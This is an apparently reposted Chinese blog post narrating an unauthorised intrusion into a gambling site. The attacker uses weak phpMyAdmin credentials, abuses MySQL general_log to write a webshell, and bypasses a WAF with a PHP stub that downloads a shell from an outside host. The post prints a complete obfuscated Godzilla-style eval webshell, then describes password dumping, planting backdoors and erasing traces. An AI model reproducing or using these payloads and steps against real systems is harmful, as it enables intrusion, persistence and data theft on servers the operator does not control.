確定目標(biāo)

收集信息

x.x.x.x

首先常規(guī)測(cè)試方法一頓懟，目錄掃描，端口掃描，js文件，中間件，指紋識(shí)別，反正該上的都上。。。

隨手加個(gè)路徑，報(bào)錯(cuò)了，當(dāng)看到這個(gè)界面我瞬間就有思路了

為什么這么說(shuō)呢，因?yàn)橹拔揖团鲆?jiàn)過(guò)這樣的網(wǎng)站報(bào)錯(cuò)，這是一個(gè)php集成環(huán)境，叫upupw，跟phpstudy是一樣的

upupw? --> pmd

phpstudy --> phpmyadmin

突破點(diǎn)

這個(gè)集成環(huán)境包也有個(gè)phpinfo的頁(yè)面，跟數(shù)據(jù)庫(kù)管理界面

u.php

?

測(cè)試一下弱口令

root/root

?

連接成功后就可以看到phpinfo的頁(yè)面

好了現(xiàn)在問(wèn)題變成phpmyadmin拿shell

getshell

三步拿shell

set global general_log='on'; SET global general_log_file='D:/xxxx/WWW/cmd.php' SELECT '<?php assert($_POST["cmd"]);?>';

當(dāng)執(zhí)行第三步的時(shí)候頁(yè)面卡在執(zhí)行中。。。沒(méi)有反應(yīng) 瞬間感覺(jué)不對(duì)，可能存在waf

換了個(gè)免殺馬試試，先寫(xiě)到txt里邊看看成功與否

沒(méi)有任何問(wèn)題，下面直接寫(xiě)入php文件

?

可以寫(xiě)入，直接去連接shell

果然有waf,當(dāng)時(shí)寫(xiě)入的時(shí)候就感覺(jué)到了，不免殺的shell，sql語(yǔ)句執(zhí)行不了

繞過(guò)waf

懟了半天都不知道是什么鬼waf，用下載文件試試
為了避免攔截php代碼的waf，我這里遠(yuǎn)程下載的腳本是利用JavaScript轉(zhuǎn)寫(xiě)php

SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php'; SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>'

訪問(wèn)11.php 就會(huì)生成shell.php
這里的shell也是用了哥斯拉的免殺shell

<?phpsession_start();@set_time_limit(0);@error_reporting(0);function E($D,$K) {for ($i=0;$i<strlen($D); $i++) {$D[$i] = $D[$i]^$K[$i+1&15];}return $D;}function Q($D) {return base64_encode($D);}function O($D) {return base64_decode($D);}$P='pass';$V='payload';$T='3c6e0b8a9c15224a';if (isset($_POST[$P])) {$F=O(E(O($_POST[$P]), $T));if (isset($_SESSION[$V])) {$L=$_SESSION[$V];$A=explode('|', $L);class C{public function nvoke($p) {eval($p."");}}$R = new C();$R->nvoke($A[0]);echo substr(md5($P.$T), 0, 16);echo Q(E(@run($F),$T));echo substr(md5($P.$T), 16);} else {$_SESSION[$V]=$F;}}

嘗試了這么多次

進(jìn)程里沒(méi)有waf進(jìn)程

權(quán)限是system

脫源碼

上傳抓密碼工具，直接獲取管理密碼,登上服務(wù)器

?

?

留后門(mén)，清理痕跡

多留幾個(gè)后門(mén)，萬(wàn)一被刪

?

這個(gè)網(wǎng)段還有這么多機(jī)器

源碼

打開(kāi)源碼才發(fā)現(xiàn)waf是360webscan

?

?

創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎(jiǎng)勵(lì)來(lái)咯，堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎(jiǎng)

總結(jié)

以上是生活随笔為你收集整理的实战|简单绕过waf拿下赌博网站的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。